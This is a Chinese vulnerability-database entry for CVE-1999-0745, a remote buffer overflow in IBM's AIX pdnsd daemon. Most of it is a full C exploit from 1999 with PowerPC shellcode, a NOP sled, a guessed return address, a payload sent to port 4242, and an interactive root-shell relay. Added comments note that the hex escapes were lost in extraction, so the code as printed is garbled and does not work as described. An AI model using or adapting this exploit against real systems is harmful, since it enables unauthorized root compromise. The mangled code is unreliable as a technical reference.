AIX pdnsd远程缓冲区溢出漏洞
漏洞ID | 1105513 | 漏洞类型 | 边界条件错误 |
发布时间 | 1999-08-17 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-0745 |
CNNVD-ID | CNNVD-199908-030 |
漏洞平台 | AIX | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
源代码浏览器的 Program Database Name Server Daemon (pdnsd) 是 IBM C Set ++ for AIX 的组件。pdnsd 存在一个缓冲区溢出漏洞，本地和远程攻击者可以利用这个漏洞获得系统的 root 用户权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/3237/info
The Source Code Browser's Program Database Name Server Daemon (pdnsd) component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to compromise root privileges on vulnerable systems.
/*## copyright LAST STAGE OF DELIRIUM oct 1999 poland *://lsd-pl.net/ #*/
/*## pdnsd #*/
/* note: to avoid a potential system hang-up, please first obtain the exact */
/* AIX OS level with the use of some OS fingerprinting method */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
/* Payload geometry used by main(): NOPNUM bytes of sled, then the three code
   fragments, then ALLIGN + ADRNUM bytes of the repeated return address. */
#define ADRNUM 4000
#define NOPNUM 4800
#define ALLIGN 1 /* leading address bytes emitted before the ADRNUM block; presumably shifts its alignment */
/* 12-byte OS-level-specific patches; main() copies the selected one over the
   three 0xffffffff placeholder words at syscallcode[32..43]. As printed, the
   backslashes of the \x escapes appear to have been lost in extraction, so
   these literals are ASCII text rather than the 12 bytes they denote. */
#define SCAIX41 "x03x68x41x5ex6dx7fx6fxd6x57x56x55x53"
#define SCAIX42 "x02x71x46x62x76x8ex78xe7x5bx5ax59x58"
/* First code fragment: PowerPC instruction words, one per 4-byte group, with
   the disassembly in the side comments. Per those comments the bnel/mflr
   pair loads the fragment's own address into r21, which the other two
   fragments dispatch through. The three 0xffffffff words at offsets 32..43
   are placeholders that main() overwrites with SCAIX41 or SCAIX42.
   Escapes appear lost in extraction (see SCAIX41): each "xHHxHHxHHxHH" group
   should be a single 4-byte word, so the strlen() and offset arithmetic in
   main() no longer match the layout the comments describe. */
char syscallcode[]=
"x7ex94xa2x79" /* xor. r20,r20,r20 */
"x40x82xffxfd" /* bnel <syscallcode> */
"x7exa8x02xa6" /* mflr r21 */
"x3axc0x01xff" /* lil r22,0x1ff */
"x3axf6xfex2d" /* cal r23,-467(r22) */
"x7exb5xbax14" /* cax r21,r21,r23 */
"x7exa9x03xa6" /* mtctr r21 */
"x4ex80x04x20" /* bctr */
"xffxffxffxff" /* placeholder word, overwritten by main() */
"xffxffxffxff" /* placeholder word, overwritten by main() */
"xffxffxffxff" /* placeholder word, overwritten by main() */
"x4cxc6x33x42" /* crorc cr6,cr6,cr6 */
"x44xffxffx02" /* svca 0x0 */
"x3axb5xffxf8" /* cal r21,-8(r21) */
;
/* Second code fragment. Bytes [2] and [3] (the 0x1234 immediate of the
   leading cmpi) are placeholders: main() stores the client's local TCP port
   there, high byte then low byte. Going by its name and the side comments it
   apparently iterates descriptors from 0x16 downward comparing a 16-bit field
   against that port to locate the connected socket; this is inferred from the
   disassembly comments, not verified. It expects r21/r22 as left by
   syscallcode, which main() places immediately before it in the payload. */
char findsckcode[]=
"x2cx74x12x34" /* cmpi cr0,r20,0x1234 */
"x41x82xffxfd" /* beql <findsckcode> */
"x7fx08x02xa6" /* mflr r24 */
"x3bx36xfex2d" /* cal r25,-467(r22) */
"x3bx40x01x01" /* lil r26,0x16 */
"x7fx78xcax14" /* cax r27,r24,r25 */
"x7fx69x03xa6" /* mtctr r27 */
"x4ex80x04x20" /* bctr */
"xa3x78xffxfe" /* lhz r27,-2(r24) */
"xa3x98xffxfa" /* lhz r28,-6(r24) */
"x7cx1bxe0x40" /* cmpl cr0,r27,r28 */
"x3bx36xfex59" /* cal r25,-423(r22) */
"x41x82xffxe4" /* beq <findsckcode+20> */
"x7fx43xd3x78" /* mr r3,r26 */
"x38x98xffxfc" /* cal r4,-4(r24) */
"x38xb8xffxf4" /* cal r5,-12(r24) */
"x93x38xffxf4" /* st r25,-12(r24) */
"x88x55xffxf6" /* lbz r2,-10(r21) */
"x7exa9x03xa6" /* mtctr r21 */
"x4ex80x04x21" /* bctrl */
"x37x5axffxff" /* ai. r26,r26,-1 */
"x2dx03xffxff" /* cmpi cr2,r3,-1 */
"x40x8axffxc8" /* bne cr2,<findsckcode+32> */
"x40x82xffxd8" /* bne <findsckcode+48> */
"x3bx36xfex03" /* cal r25,-509(r22) */
"x3bx76xfex02" /* cal r27,-510(r22) */
"x7fx23xcbx78" /* mr r3,r25 */
"x88x55xffxf7" /* lbz r2,-9(r21) */
"x7exa9x03xa6" /* mtctr r21 */
"x4ex80x04x21" /* bctrl */
"x7cx7axdax14" /* cax r3,r26,r27 */
"x7ex84xa3x78" /* mr r4,r20 */
"x7fx25xcbx78" /* mr r5,r25 */
"x88x55xffxfb" /* lbz r2,-5(r21) */
"x7exa9x03xa6" /* mtctr r21 */
"x4ex80x04x21" /* bctrl */
"x37x39xffxff" /* ai. r25,r25,-1 */
"x40x80xffxd4" /* bge <findsckcode+100> */
;
/* Third code fragment followed by the "/bin/sh" string it addresses through
   r31-relative offsets (the st/stb instructions in the side comments). It
   dispatches through r21 as set up by syscallcode. main() sizes it with
   strlen(), so it must contain no 0x00 byte before the terminator. As with the
   other fragments, the \x escapes appear to have been lost as printed. */
char shellcode[]=
"x7cxa5x2ax79" /* xor. r5,r5,r5 */
"x40x82xffxfd" /* bnel <shellcode> */
"x7fxe8x02xa6" /* mflr r31 */
"x3bxffx01x20" /* cal r31,0x120(r31) */
"x38x7fxffx08" /* cal r3,-248(r31) */
"x38x9fxffx10" /* cal r4,-240(r31) */
"x90x7fxffx10" /* st r3,-240(r31) */
"x90xbfxffx14" /* st r5,-236(r31) */
"x88x55xffxf4" /* lbz r2,-12(r21) */
"x98xbfxffx0f" /* stb r5,-241(r31) */
"x7exa9x03xa6" /* mtctr r21 */
"x4ex80x04x20" /* bctr */
"/bin/sh"
;
/* Sled filler: the word 0x7ffffb78 is PowerPC "or r31,r31,r31", a register
   move onto itself, i.e. a no-op. main() repeats it NOPNUM times, one byte at
   a time via nop[i%4]. Escapes appear lost as printed (see SCAIX41). */
char nop[]="x7fxffxfbx78";
/*
 * Entry point. argv[1] is the target host (dotted quad or hostname), argv[2]
 * the AIX level, "41" or "42", which selects the SCAIX patch. Connects to TCP
 * port 4242, sends one length-prefixed payload, then relays stdin and the
 * socket to each other until a read fails.
 *
 * Pre-C99 style throughout: implicit int return, and exit/atoi/memcpy/strlen/
 * inet_addr/ioctl are called without prototypes (no <stdlib.h>, <string.h>,
 * <arpa/inet.h> or <sys/ioctl.h> among the includes). Several string
 * literals appear to have lost their backslash escapes in extraction ("n"
 * where "\n" is meant, "xHH" where "\xHH" is meant), so the listing as
 * printed does not behave as its comments describe.
 */
main(int argc,char **argv){
char buffer[10000],address[4],*b;
int i,n,l,cnt,sck; /* this cnt is unused; a second cnt is declared inside the relay loop */
struct hostent *hp;
struct sockaddr_in adr;
printf("copyright LAST STAGE OF DELIRIUM oct 1999 poland //lsd-pl.net/n");
printf("pdnsd for AIX 4.1 4.2 PowerPC/POWERnn");
if(argc!=3){
printf("usage: %s address 41|42n",argv[0]);exit(-1);
}
/* Copy the 12-byte OS-level patch over the placeholder words at syscallcode[32..43]. */
switch(atoi(argv[2])){
case 41: memcpy(&syscallcode[32],SCAIX41,12); break;
case 42: memcpy(&syscallcode[32],SCAIX42,12); break;
default: exit(-1);
}
sck=socket(AF_INET,SOCK_STREAM,0); /* return value unchecked; a failure surfaces at connect() instead */
adr.sin_family=AF_INET;
adr.sin_port=htons(4242); /* pdnsd port, hard-coded */
/* inet_addr() returns an unsigned type; the -1 comparison relies on the usual
   arithmetic conversion to match INADDR_NONE. */
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4); /* assumes a 4-byte (IPv4) h_addr */
}
if(connect(sck,(struct sockaddr*)&adr,sizeof(struct sockaddr_in))<0){
perror("error");exit(-1);
}
/* Announced payload length. It omits syscallcode, findsckcode and the ALLIGN
   byte, so the buffer assembled below is longer than l. */
l=ADRNUM+NOPNUM+strlen(shellcode);
/* Hard-coded, guessed stack address nudged by half the sled length
   (presumably to land mid-sled). Storing through an unsigned long pointer
   fits the 4-byte address[] only where sizeof(unsigned long)==4, i.e. 32-bit
   AIX; on an LP64 build this write overruns the array. */
*((unsigned long*)address)=htonl(0x2ff20908+(NOPNUM>>1));
/* Learn our own local port. The length out-parameter is a plain int rather
   than socklen_t. If getsockname() fails, fall back to STREAMS/TLI ioctls
   written as raw numbers: ('S'<<8)|2 looks like I_PUSH and ('T'<<8)|144 like
   TI_GETMYNAME; neither ioctl result is checked. */
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=ntohs(adr.sin_port);
printf("port=%d connected! ",n);fflush(stdout);
/* Patch the local port, big-endian, into the cmpi immediate at findsckcode[2..3]. */
findsckcode[0+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[0+3]=(unsigned char)(n&0xff);
/* Assemble the payload: 4-byte big-endian length, sled, the three fragments,
   then the address pattern ALLIGN + ADRNUM times. There is no bound check
   against sizeof buffer; it fits only because every length is a fixed
   constant of this file. */
b=buffer;
*((unsigned long*)b)=htonl(l); /* same 4-byte unsigned long assumption as above */
b+=4;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(syscallcode);i++) *b++=syscallcode[i]; /* signed/unsigned comparison, harmless at these sizes */
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
for(i=0;i<ALLIGN;i++) *b++=address[i%4];
for(i=0;i<ADRNUM;i++) *b++=address[i%4];
*b=0;
/* Send the length prefix plus l-1 payload bytes, pause, then one more byte to
   complete l; the tail of the address block assembled above is never sent.
   The write()/send() return values are not checked. */
write(sck,buffer,4+l-1);sleep(3);
send(sck,"x",1,0);
printf("sent!n");
write(sck,"/bin/uname -an",14); /* 14 bytes; presumably "/bin/uname -a\n" before the escape was lost */
/* Relay loop: select() on stdin and the socket and copy each direction until
   a read returns <1 with an errno other than EWOULDBLOCK/EAGAIN. A select()
   error (-1) is non-zero and so is handled as if a descriptor were ready;
   write() results are again unchecked. */
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt; /* shadows the unused outer cnt */
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
|参考资料
来源:BID
名称:590
链接:http://www.securityfocus.com/bid/590
来源:CIAC
名称:J-059
链接:http://www.ciac.org/ciac/bulletins/j-059.shtml
来源:NSFOCUS
名称:4025
链接:http://www.nsfocus.net/vulndb/4025